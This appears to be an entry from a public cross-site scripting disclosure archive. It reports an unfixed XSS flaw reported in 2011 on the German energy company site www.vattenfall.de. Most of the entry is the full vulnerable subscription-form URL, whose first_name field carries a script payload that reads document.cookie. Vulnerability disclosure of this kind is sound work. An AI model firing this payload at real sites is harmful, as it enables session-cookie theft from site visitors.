Unfixed XSS vulnerability at www.vattenfall.de

2011-01-16T00:00:00
ID XSSED:71715
Type xssed
Reporter kabelbrand
Modified 2012-10-01T00:00:00

Description

Security researcher kabelbrand submitted on 16/01/2011 a cross-site scripting (XSS) vulnerability affecting www.vattenfall.de, which at the time of submission ranked 59442 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 10/01/2012. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.vattenfall.de/de/subscriptionForm.xml?current-page=%2Fde%2Fpresse-aboservice.htm&sendpageUrl=presse-aboservice.htm&subscriptionList=3981C1ACFE604763966A661C88FA1922.xml&subscriptionTimestamp=20%3A35%3A13%3A59&action=subscribe&subscribeHeadline=Anmeldung&unsubscribeHeadline=Abmeldung&first_name_input=mandatory&first_name=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E&surname_input=mandatory&surname=&telephone_input=visible&telephone=&fax_input=visible&fax=&company_input=visible&company=&street_input=visible&street=&house_nr_input=visible&house_nr=&zip_code_input=visible&zip_code=&city_input=visible&city=&email_input=mandatory&email=&stf_categorylist=Bergbau|+Energiepolitik|+Gesellschaft%2FSport%2FKultur|+Innovation+%26+Umwelt|+Netz%2FHandel%2FIT&categories_nr=1%3B2%3B3%3B4%3B5&subscription_link_text=Schalten+Sie+nun+Ihr+Abonnement+frei!&unsubscription_link_text=Beenden+Sie+jetzt+Ihr+Abonnement!&leading_message_text=Sie+haben+sich+f%C3%BCr+das+Abonnement+von+Aboservice+mit+folgenden+Daten+registriert%3A&trailing_message_text_subscription=Zum+Abbestellen+gen%C3%BCgt+es%2C+Ihre+E-Mail-Adresse+in+das+Formular+unserer+Internet-Abo-Seite+einzugeben+und+auf+%22Abbestellen%22+zu+klicken.+Ihre+Daten+%C3%A4ndern+Sie%2C+indem+Sie+dort+ebenfalls+Ihre+E-Mail-Adresse+plus+die+neuen+Daten+angeben.%3CBR%3E%3CBR%3EBeachten+Sie+auch+unsere+Hinweise+zum+Datenschutz.&trailing_message_text_unsubscription=Ihre+Daten+%C3%A4ndern+Sie%2C+indem+Sie+dort+ebenfalls+Ihre+E-Mail-Adresse+plus+die+neuen+Daten+angeben.+%3CBR%3E%3CBR%3EBeachten+Sie+auch+unsere+Hinweise+zum+Datenschutz.&Absenden.x=64&Absenden.y=13&Absenden=submit